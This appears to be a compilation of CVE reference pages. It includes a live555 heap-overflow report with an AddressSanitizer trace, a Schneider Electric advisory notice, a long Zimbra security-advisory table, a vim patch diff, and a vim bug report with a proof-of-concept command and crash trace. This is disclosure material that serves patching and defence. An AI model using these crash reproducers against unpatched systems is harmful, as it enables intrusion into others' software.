    #21 0x64ef1a in BasicTaskScheduler0::doEventLoop(char volatile\*) /home/ubuntu/experiments/live555/BasicUsageEnvironment/BasicTaskScheduler0.cpp:80:5

0x619000000470 is located 0 bytes to the right of 1008-byte region \[0x619000000080,0x619000000470)
allocated by thread T1 here:
    #0 0x4c789d in operator new(unsigned long) (/home/ubuntu/experiments/live555/testProgs/testOnDemandRTSPServer+0x4c789d)
    #1 0x645882 in BasicTaskScheduler::createNew(unsigned int) /home/ubuntu/experiments/live555/BasicUsageEnvironment/BasicTaskScheduler.cpp:32:9


SUMMARY: AddressSanitizer: heap-buffer-overflow /home/ubuntu/experiments/live555/BasicUsageEnvironment/BasicTaskScheduler.cpp:115:61 in BasicTaskScheduler::SingleStep(unsigned int)
Shadow bytes around the buggy address:
  0x0c327fff8030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c327fff8040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c327fff8050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c327fff8060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c327fff8070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c327fff8080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00\[fa\]fa
  0x0c327fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c327fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c327fff80b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c327fff80c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c327fff80d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==13==ABORTING




Best regards,
Jinsheng Ba

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.live555.com/pipermail/live-devel/attachments/20210909/84e04d3f/attachment-0001.htm\>

*   Previous message (by thread): \[Live-devel\] Memory Leak in MPEGProgramStreamParser
*   Next message (by thread): \[Live-devel\] A Heap-overflow in FD\_ISSET
*   **Messages sorted by:** \[ date \] \[ thread \] \[ subject \] \[ author \]

More information about the live-devel mailing list

CVE-2021-41396: [Live-devel] A Heap-overflow in FD_ISSET

This updated advisory is a follow-up to the original advisory titled ICSA-22-055-03 Schneider Electric Easergy P5 and P3 that was published February 24, 2022, on the ICS webpage on cisa.gov/ics. This advisory contains mitigations for Use of Hard-coded Credentials, Classic Buffer Overflow, and Improper Input Validation vulnerabilities in Schneider Electric Easergy P5 and P3 medium voltage protection relays.

Schneider Electric Easergy P5 and P3 (Update A)

Zimbra Collaboration Open Source 8.8.15 does not encrypt the initial-login randomly created password (from the "zmprove ca" command). It is visible in cleartext on port UDP 514 (aka the syslog port).

The following Security Vulnerabilities have been fixed and released in recent versions of Zimbra Collaboration software. For the latest release and patches, please be sure to update your Zimbra Collaboration servers with the software available on our Download pages:

**Note**: only supported versions are referenced, however older unsupported versions often have the same vulnerabilities and should be upgraded to supported versions as soon as possible.  
_(going back to ZCS 7.1.3)_

Bug#

Summary

**CVE-ID**

**CVSS  
Score**

Zimbra  
Rating

Fix Release or  
Patch Version

Reporter

Memcached poisoning with unauthenticated request.

CVE-2022-27924

Medium

9.0.0 Patch 24, 8.8.15 Patch 31

Simon Scannell of Sonarsource

RCE through mboximport from authenticated user.

CVE-2022-27925

Medium

9.0.0 Patch 24, 8.8.15 Patch 31

Mikhail Klyuchnikov of Positive Technologies

Proxy Servlet Open Redirect Vulnerability

CVE-2021-35209

Medium

9.0.0 Patch 16, 8.8.15 Patch 23

Simon Scannell of Sonarsource

Open Redirect Vulnerability in preauth servlet

CVE-2021-34807

Low

9.0.0 Patch 16, 8.8.15 Patch 23

Simon Scannell of Sonarsource

Stored XSS Vulnerability in ZmMailMsgView.java

CVE-2021-35208

Medium

9.0.0 Patch 16, 8.8.15 Patch 23

Simon Scannell of Sonarsource

XSS vulnerability in Zimbra Web Client via loginErrorCode

CVE-2021-35207

Medium

9.0.0 Patch 16, 8.8.15 Patch 23

Heap-based buffer overflow vulnerabilities in PHP < 7.3.10

9.8

Critical

9.0.0 Patch 13

Upstream, see CVE-2019-9641, CVE-2019-9640

Heap-based buffer overflow vulnerabilities in PHP < 7.3.10

9.8

Critical

8.8.15 Patch 20

Upstream, see CVE-2019-9641, CVE-2019-9640

Upgraded Apache to 2.4.46 to avoid multiple vulnerabilities.

7.8

High

9.0.0 Patch 13

Upstream, see CVE-2019-0211, CVE-2019-0217

Upgraded Apache to 2.4.46 to avoid multiple vulnerabilities.

7.8

High

8.8.15 Patch 20

Upstream, see CVE-2019-0211, CVE-2019-0217

XXE (CWE-776) vulnerability in saml consumer store servlet (Network Edition)

CVE-2020-35123

Medium

9.0.0 Patch 10

Primerica

XXE (CWE-776) vulnerability in saml consumer store servlet (Network Edition)

CVE-2020-35123

Medium

8.8.15 Patch 17

Primerica

XSS CWE-79 vulnerability in tinymce

n/a

6.1

Medium

9.0.0 Patch 5

Upstream, see CVE-2019-1010091

Memory Leak in nodejs library mem

n/a

5.5

Medium

9.0.0 Patch 5

Upstream, see WS-2018-0236

Persistent XSS

CVE-2020-13653

Minor

8.8.15 Patch 11, 9.0.0 Patch 4

Telenet

Unrestricted Upload of File with Dangerous Type CWE-434

CVE-2020-12846

6.0

Minor

8.8.16 Patch 10, 9.0.0 Patch 3

Telenet

Persistent XSS CWE-79

CVE-2020-11737

4.3

Minor

9.0.0 Patch 2

Zimbra

109174

Non-Persistent XSS CWE-79

CVE-2019-12427

4.3

Minor

8.8.15 Patch 1

Meridian Miftari

109141

Non-Persistent XSS CWE-79

CVE-2019-15313

4.3

Minor

8.8.15 Patch 1

Quang Bui

109124

Non-Persistent XSS CWE-79

CVE-2019-8947

2.6

Minor

\-

Issam Rabhi of Sysdream

109123

Persistent XSS CWE-79

CVE-2019-8946

2.6

Minor

\-

Issam Rabhi of Sysdream

109122

Persistent XSS CWE-79

CVE-2019-8945

3.5

Minor

\-

Issam Rabhi of Sysdream

109117

Persistent XSS CWE-79

CVE-2019-11318

3.5

Minor

8.8.12 Patch 1

Mondher Smii

109127

SSRF CWE-918 / CWE-807

CVE-2019-9621

4.0

Minor

8.7.11 Patch11  
8.8.9 Patch10  
8.8.10 Patch8  
8.8.11 Patch4  
8.8.12

An Trinh

109096

Blind SSRF CWE-918

CVE-2019-6981

4.0

Minor

8.7.11 Patch11  
8.8.9 Patch10  
8.8.10 Patch8  
8.8.11 Patch4  
8.8.12

An Trinh

109129

XXE CWE-611  
(8.7.x only)

CVE-2019-9670

6.4

Major

8.7.11 Patch10

Khanh Van Pham  
An Trinh

109097

Insecure object deserialization CWE-502

CVE-2019-6980

5.4

Major

8.7.11 Patch9  
8.8.9 Patch10  
8.8.10 Patch7  
8.8.11 Patch3  
8.8.12

An Trinh

109093

XXE CWE-611

CVE-2018-20160

6.4

Major

8.7.x see 109129 above  
8.8.9 Patch9  
8.8.10 Patch5  
8.8.11 Patch1  
8.8.12

An Trinh

109017

Non-Persistent XSS CWE-79

CVE-2018-14013

4.3

Minor

8.7.11 Patch8  
8.8.9 Patch9  
8.8.10 Patch5  
8.8.11

Issam Rabhi of Sysdream

109020

Persistent XSS CWE-79

CVE-2018-18631

5.0

Major

8.7.11 Patch7  
8.8.9 Patch7  
8.8.10 Patch2  
8.8.11

Netragard

109018

Non-Persistent CWE-79

CVE-2018-14013

2.6

Minor

8.7.11 Patch7  
8.8.9 Patch6  
8.8.10 Patch1  
8.8.11

Issam Rabhi of Sysdream

109021

Limited Content Spoofing CWE-345

CVE-2018-17938

4.3

Minor

8.8.10

Sumit Sahoo

109012

Account Enumeration CWE-203

CVE-2018-15131

5.0

Major

8.7.11 Patch6  
8.8.8 Patch9  
8.8.9 Patch3

Danielle Deibler

108970

Persistent XSS CWE-79

CVE-2018-14425

3.5

Minor

8.8.8 Patch7  
8.8.9 Patch1

Diego Di Nardo

108902

Persistent XSS CWE-79

CVE-2018-10939

3.5

Minor

8.6.0 Patch11  
8.7.11 Patch4  
8.8.8 Patch4

Diego Di Nardo

108963

Verbose Error Messages CWE-209

CVE-2018-10950

3.5

Minor

8.7.11 Patch3  
8.8.8

Netragard

108962

Account Enumeration CWE-203

CVE-2018-10949

5.0

Major

8.7.11 Patch3  
8.8.8

Netragard

108894

Persistent XSS CWE-199

CVE-2018-10951

3.6

Minor

8.6.0 Patch10  
8.7.11 Patch3  
8.8.8

Netragard

97579

CSRF CWE-352

CVE-2015-7610

5.8

Major

8.6.0 Patch10  
8.7.11 Patch2  
8.8.8 Patch1

Fortinet's FortiGuard Labs

108786

Persistent XSS CWE-79

CVE-2018-6882

4.3

Minor

8.6.0 Patch10  
8.7.11 Patch1  
8.8.7  
8.8.8

Stephan Kaag of Securify

108265

Persistent XSS CWE-79

CVE-2017-17703

4.3

Minor

8.6.0 Patch9  
8.7.11 Patch1  
8.8.3

Veit Hailperin

107963

Host header injection CWE-20

\-

4.3

Minor

8.8.0 Beta2

\-

107948

107949

Persistent XSS CWE-79

CVE-2018-10948

3.5

Minor

8.6.0 Patch10  
8.7.11 Patch3  
8.8.0 Beta2

Lucideus  
Phil Pearl

107925

Persistent XSS - snippet CWE-79

CVE-2017-8802

3.5

Minor

8.6.0 Patch9  
8.7.11 Patch1  
8.8.0 Beta2

Compass Security

107878

Persistent XSS - location CWE-79

CVE-2017-8783

4.0

Minor

8.7.10

Stephan Kaag of Securify

107712

Improper limitation of file paths CWE-22

CVE-2017-6821

4.0

Minor

8.7.6

Greg Solovyev, Phil Pearl

107684

Improper handling of privileges CWE-280

CVE-2017-6813

4.0

Major

8.6.0 Patch9  
8.7.6

Greg Solovyev

106811

XXE CWE-611

CVE-2016-9924

5.8

Major

8.6.0 Patch10  
8.7.4

Alastair Gray

106612

Persistent XSS CWE-79

CVE-2017-7288

4.3

Minor

8.6.0 Patch11  
8.7.1

Sammy Forgit

105001  
105174

XSS CWE-79

CVE-2016-5721

4.3  
2.1

Minor

8.6.0 Patch11  
8.7.0

Secu

104552  
104703

XSS CWE-79

CVE-2016-3999

4.3

Minor

8.7.0

Nam Habach

104477

Open Redirect CWE-601

CVE-2016-4019

4.3

Minor

8.7.0

Zimbra

104294  
104456

CSRF CWE-352

CVE-2016-3406

2.6

Minor

8.6.0 Patch8  
8.7.0

Zimbra

104222

104910  
105071  

105175

XSS CWE-79

CVE-2016-3407

4.3  
3.5  
4.3  
2.1

Minor

8.6.0 Patch11  
8.7.0

Zimbra

103997

104413  
104414  
104777  

104791

XSS CWE-79

CVE-2016-3412

3.5

Minor

8.7.0

Zimbra

103996

XXE (Admin) CWE-611\-

CVE-2016-3413

2.6

Minor

8.6.0 Patch11  
8.7.0

Zimbra

103961  
104828

CSRF CWE-352

CVE-2016-3405

4.3

Minor

8.6.0 Patch8  
8.7.0

Zimbra

103959

CSRF CWE-352

CVE-2016-3404

4.3

Minor

8.6.0 Patch8  
8.7.0

Zimbra

103956

103995  
104475  
104838  

104839

XSS CWE-79

CVE-2016-3410

4.3

Minor

8.6.0 Patch11  
8.7.0

Zimbra

103609

XSS CWE-79

CVE-2016-3411

3.5

Minor

8.6.0 Patch11  
8.7.0

Zimbra

102637

XSS CWE-79

CVE-2016-3409

4.3

Minor

8.6.0 Patch11  
8.7.0

Peter Nguyen

102276

Deserialization of Untrusted Data CWE-502

CVE-2016-3415

5.8

Major

8.7.0

Zimbra

102227

Deserialization of Untrusted Data CWE-502

n/a

7.5

Major

8.7.0

Upstream, see  
CVE-2015-4852

102029

CWE-674

CVE-2016-3414

4.0

Minor

8.6.0 Patch7  
8.7.0

Zimbra

101813

XSS CWE-79

CVE-2016-3408

4.3

Minor

8.6.0 Patch11  
8.7.0

Volexity

100885  
100899

CSRF CWE-352

CVE-2016-3403

5.8

Major

8.6.0 Patch8  
8.7.0

Sysdream

99810

CWE-284 CWE-203

CVE-2016-3401

3.5

Minor

8.7.0

Zimbra

99167

Account Enumeration CWE-203

CVE-2016-3402

2.6

Minor

8.7.0

Zimbra

101435  
101436

Persistent XSS CWE-79

CVE-2015-7609

6.4  
2.3

Major

8.6.0 Patch5  
8.7.0

Fortinet's FortiGuard Labs

101559

100133  
99854  
99914  

96973

XSS CWE-79

CVE-2015-2249

3.5

Minor

8.6.0 Patch5  
8.7.0

Zimbra

99236

XSS Vuln in YUI components in ZCS

n/a

4.3

Minor

8.6.0 Patch5

Upstream, see  
CVE-2012-5881  
CVE-2012-5882  
CVE-2012-5883

98358

98216  

98215

Non-Persistent XSS CWE-79

CVE-2015-2249

4.3

Minor

8.6.0 Patch2  
8.7.0

Cure53

97625

Non-Persistent XSS CWE-79

CVE-2015-2230

3.5

Minor

8.6.0 Patch2

MWR InfoSecurity

96105

Improper Input Validation CWE-20

CVE-2014-8563

5.8

Major

8.0.9  
8.5.1  
8.6.0

 -

83547

CSRF Vulnerability CWE-352

CVE-2015-6541

5.8

Major

8.5.0

iSEC Partners, Sysdream

87412

92825  
92833  

92835

XSS Vulnerabilities CWE-79  
(8.0.7 Patch  
contains 87412)

CVE-2014-5500

4.3

Minor

8.0.8  
8.5.0

 -

83550

Session Fixation CWE-384

CVE-2013-5119

5.8

Major

8.5.0

\- 

91484

Patch ZCS8 OpenSSL for CVE-2014-0224

n/a

6.8

Major

8.0.3+Patch  
8.0.4+Patch  
8.0.5+Patch  
8.0.6+Patch  
8.0.7+Patch

Upstream, see  
CVE-2014-0224

88708

Patch ZCS8 OpenSSL for CVE-2014-0160

n/a

5.0

Major

8.0.3+Patch  
8.0.4+Patch  
8.0.5+Patch  
8.0.6+Patch  
8.0.7+Patch  
8.0.7

Upstream, see  
CVE-2014-0160

85499

Upgrade to OpenSSL 1.0.1f

n/a

4.3  
4.3  
5.8

Major

8.0.7

Upstream, see  
CVE-2013-4353  
CVE-2013-6449  
CVE-2013-6450

84547

XXE CWE-611

CVE-2013-7217

6.4  
(not 10.0)

Critical

7.2.2\_Patch3  
7.2.3\_Patch  
7.2.4\_Patch2  
7.2.5\_Patch  
7.2.6  
8.0.3\_Patch3  
8.0.4\_Patch2  
8.0.5\_Patch  
8.0.6

Private

85478

XSS vulnerability in message view

\-

6.4

Major

8.0.7

Alban Diquet  
of iSEC Partners

85411

Local root privilege escalation

\-

6.2

Major

8.0.7

Matthew David

85000

Patch nginx for CVE-2013-4547

n/a

7.5

Major

7.2.7  
8.0.7

Upstream, see  
CVE-2013-4547

80450  
80131  
80445  
80132

Upgrade to JDK 1.6 u41  
Upgrade OpenSSL to 1.0.0k  
Upgrade to JDK 1.7u15+  
Upgrade to OpenSSL 1.0.1d

n/a

2.6

Minor

7.2.3  
7.2.3  
8.0.3  
8.0.3

Upstream, see  
CVE-2013-0169

80338

Local file inclusion via skin/branding feature CWE-22

CVE-2013-7091

5.0

Critical

6.0.16\_Patch  
7.1.1\_Patch6  
7.1.3\_Patch3  
7.2.2\_Patch2  
7.2.3  
8.0.2\_Patch  
8.0.3

Private

77655

Separate keystore for CAs used for X509 authentication

\-

5.8

Major

8.0.7

Private

75424

Upgrade to Clamav 0.97.5

n/a

4.3  
4.3  
4.3

Minor

7.2.1

Upstream, see  
CVE-2012-1457  
CVE-2012-1458  
CVE-2012-1459

64981

Do not allow HTTP GET for login

\-

6.8

Major

7.1.3\_Patch  
7.1.4

Private

CVE-2022-32294: Zimbra Security Advisories - Zimbra :: Tech Center

Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.0045.

Permalink

Browse files

patch 9.0.0046: reading past end of completion with duplicate match

Problem:    Reading past end of completion with duplicate match.
Solution:   Check string length

*   Loading branch information

1 parent caea664 commit baefde14550231f6468ac2ed2ed495bc381c0c92

Showing **3 changed files** with **14 additions** and **1 deletion**.

*   *   insexpand.c
    *   *   test\_ins\_complete.vim
    *   version.c

@@ -786,7 +786,8 @@ ins\_compl\_add(

{

if (!match\_at\_original\_text(match)

&& STRNCMP(match->cp\_str, str, len) == 0

&& match->cp\_str\[len\] == NUL)

&& ((int)STRLEN(match->cp\_str) <= len

|| match->cp\_str\[len\] == NUL))

return NOTDONE;

match = match->cp\_next;

} while (match != NULL && !is\_first\_match(match));

@@ -2112,5 +2112,15 @@ func Test\_infercase\_very\_long\_line()

set noic noinfercase

endfunc

  

func Test\_ins\_complete\_add()

" this was reading past the end of allocated memory

new

norm o

norm 7o

sil! norm o

  

bwipe!

endfunc

  

  

" vim: shiftwidth\=2 sts\=2 expandtab

@@ -735,6 +735,8 @@ static char \*(features\[\]) =

  

static int included\_patches\[\] =

{ /\* Add new patch number below this line \*/

/\*\*/

46,

/\*\*/

45,

/\*\*/

**0 comments on commit baefde1**

Please sign in to comment.

CVE-2022-2344: patch 9.0.0046: reading past end of completion with duplicate match · vim/vim@baefde1

Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.0044.

**Description**

Heap-based Buffer Overflow in function ins\_compl\_add at insexpand.c:751

**vim version**

    git log
    commit 324478037923feef1eb8a771648e38ade9e5e05a (HEAD -> master, tag: v9.0.0042, origin/master, origin/HEAD)
    
    

**POC**

    ./afl/src/vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_hbor4_s.dat -c :qa!
    =================================================================
    ==3114==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61e0000827cb at pc 0x0000009b3131 bp 0x7ffeee1a6850 sp 0x7ffeee1a6848
    READ of size 1 at 0x61e0000827cb thread T0
        #0 0x9b3130 in ins_compl_add /home/fuzz/fuzz/vim/afl/src/insexpand.c:751:10
        #1 0x9b1294 in ins_compl_add_infercase /home/fuzz/fuzz/vim/afl/src/insexpand.c:697:12
        #2 0x9d137b in get_next_default_completion /home/fuzz/fuzz/vim/afl/src/insexpand.c:3629:6
        #3 0x9cc7f7 in get_next_completion_match /home/fuzz/fuzz/vim/afl/src/insexpand.c:3694:24
        #4 0x9c9a7e in ins_compl_get_exp /home/fuzz/fuzz/vim/afl/src/insexpand.c:3767:20
        #5 0x9c8438 in find_next_completion_match /home/fuzz/fuzz/vim/afl/src/insexpand.c:4002:21
        #6 0x9c0f04 in ins_compl_next /home/fuzz/fuzz/vim/afl/src/insexpand.c:4103:9
        #7 0x9c197c in ins_complete /home/fuzz/fuzz/vim/afl/src/insexpand.c:4954:9
        #8 0x674939 in edit /home/fuzz/fuzz/vim/afl/src/edit.c:1281:10
        #9 0xb989c7 in op_change /home/fuzz/fuzz/vim/afl/src/ops.c:1758:14
        #10 0xbb25f7 in do_pending_operator /home/fuzz/fuzz/vim/afl/src/ops.c:4041:7
        #11 0xb21ac3 in normal_cmd /home/fuzz/fuzz/vim/afl/src/normal.c:961:2
        #12 0x8156fe in exec_normal /home/fuzz/fuzz/vim/afl/src/ex_docmd.c:8814:6
        #13 0x814f28 in exec_normal_cmd /home/fuzz/fuzz/vim/afl/src/ex_docmd.c:8777:5
        #14 0x814ad9 in ex_normal /home/fuzz/fuzz/vim/afl/src/ex_docmd.c:8695:6
        #15 0x7dda59 in do_one_cmd /home/fuzz/fuzz/vim/afl/src/ex_docmd.c:2570:2
        #16 0x7ca915 in do_cmdline /home/fuzz/fuzz/vim/afl/src/ex_docmd.c:992:17
        #17 0xe5c8fe in do_source_ext /home/fuzz/fuzz/vim/afl/src/scriptfile.c:1674:5
        #18 0xe59396 in do_source /home/fuzz/fuzz/vim/afl/src/scriptfile.c:1801:12
        #19 0xe58cd3 in cmd_source /home/fuzz/fuzz/vim/afl/src/scriptfile.c:1174:14
        #20 0xe583de in ex_source /home/fuzz/fuzz/vim/afl/src/scriptfile.c:1200:2
        #21 0x7dda59 in do_one_cmd /home/fuzz/fuzz/vim/afl/src/ex_docmd.c:2570:2
        #22 0x7ca915 in do_cmdline /home/fuzz/fuzz/vim/afl/src/ex_docmd.c:992:17
        #23 0x7cf591 in do_cmdline_cmd /home/fuzz/fuzz/vim/afl/src/ex_docmd.c:586:12
        #24 0x1427482 in exe_commands /home/fuzz/fuzz/vim/afl/src/main.c:3133:2
        #25 0x142361b in vim_main2 /home/fuzz/fuzz/vim/afl/src/main.c:780:2
        #26 0x1418b2d in main /home/fuzz/fuzz/vim/afl/src/main.c:432:12
        #27 0x7fd83cb66082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
        #28 0x41ea5d in _start (/home/fuzz/fuzz/vim/afl/src/vim+0x41ea5d)
    
    0x61e0000827cb is located 125 bytes to the right of 2766-byte region [0x61e000081c80,0x61e00008274e)
    allocated by thread T0 here:
        #0 0x499cbd in malloc (/home/fuzz/fuzz/vim/afl/src/vim+0x499cbd)
        #1 0x4cb392 in lalloc /home/fuzz/fuzz/vim/afl/src/alloc.c:246:11
        #2 0x4cb27a in alloc /home/fuzz/fuzz/vim/afl/src/alloc.c:151:12
        #3 0xf90f0d in vim_strnsave /home/fuzz/fuzz/vim/afl/src/strings.c:44:9
        #4 0x9b349a in ins_compl_add /home/fuzz/fuzz/vim/afl/src/insexpand.c:768:26
        #5 0x9b1294 in ins_compl_add_infercase /home/fuzz/fuzz/vim/afl/src/insexpand.c:697:12
        #6 0x9d137b in get_next_default_completion /home/fuzz/fuzz/vim/afl/src/insexpand.c:3629:6
        #7 0x9cc7f7 in get_next_completion_match /home/fuzz/fuzz/vim/afl/src/insexpand.c:3694:24
        #8 0x9c9a7e in ins_compl_get_exp /home/fuzz/fuzz/vim/afl/src/insexpand.c:3767:20
        #9 0x9c8438 in find_next_completion_match /home/fuzz/fuzz/vim/afl/src/insexpand.c:4002:21
        #10 0x9c0f04 in ins_compl_next /home/fuzz/fuzz/vim/afl/src/insexpand.c:4103:9
        #11 0x9c197c in ins_complete /home/fuzz/fuzz/vim/afl/src/insexpand.c:4954:9
        #12 0x674939 in edit /home/fuzz/fuzz/vim/afl/src/edit.c:1281:10
        #13 0xb989c7 in op_change /home/fuzz/fuzz/vim/afl/src/ops.c:1758:14
        #14 0xbb25f7 in do_pending_operator /home/fuzz/fuzz/vim/afl/src/ops.c:4041:7
        #15 0xb21ac3 in normal_cmd /home/fuzz/fuzz/vim/afl/src/normal.c:961:2
        #16 0x8156fe in exec_normal /home/fuzz/fuzz/vim/afl/src/ex_docmd.c:8814:6
        #17 0x814f28 in exec_normal_cmd /home/fuzz/fuzz/vim/afl/src/ex_docmd.c:8777:5
        #18 0x814ad9 in ex_normal /home/fuzz/fuzz/vim/afl/src/ex_docmd.c:8695:6
        #19 0x7dda59 in do_one_cmd /home/fuzz/fuzz/vim/afl/src/ex_docmd.c:2570:2
        #20 0x7ca915 in do_cmdline /home/fuzz/fuzz/vim/afl/src/ex_docmd.c:992:17
        #21 0xe5c8fe in do_source_ext /home/fuzz/fuzz/vim/afl/src/scriptfile.c:1674:5
        #22 0xe59396 in do_source /home/fuzz/fuzz/vim/afl/src/scriptfile.c:1801:12
        #23 0xe58cd3 in cmd_source /home/fuzz/fuzz/vim/afl/src/scriptfile.c:1174:14
        #24 0xe583de in ex_source /home/fuzz/fuzz/vim/afl/src/scriptfile.c:1200:2
        #25 0x7dda59 in do_one_cmd /home/fuzz/fuzz/vim/afl/src/ex_docmd.c:2570:2
        #26 0x7ca915 in do_cmdline /home/fuzz/fuzz/vim/afl/src/ex_docmd.c:992:17
        #27 0x7cf591 in do_cmdline_cmd /home/fuzz/fuzz/vim/afl/src/ex_docmd.c:586:12
        #28 0x1427482 in exe_commands /home/fuzz/fuzz/vim/afl/src/main.c:3133:2
        #29 0x142361b in vim_main2 /home/fuzz/fuzz/vim/afl/src/main.c:780:2
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/fuzz/fuzz/vim/afl/src/insexpand.c:751:10 in ins_compl_add
    Shadow bytes around the buggy address:
      0x0c3c800084a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c3c800084b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c3c800084c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c3c800084d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c3c800084e0: 00 00 00 00 00 00 00 00 00 06 fa fa fa fa fa fa
    =>0x0c3c800084f0: fa fa fa fa fa fa fa fa fa[fa]fa fa fa fa fa fa
      0x0c3c80008500: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c3c80008510: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c3c80008520: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c3c80008530: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c3c80008540: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==3114==ABORTING
    

poc\_hbor4\_s.dat

**Impact**

This vulnerability is capable of crashing software, modify memory, and possible remote execution.

Tag

#buffer_overflow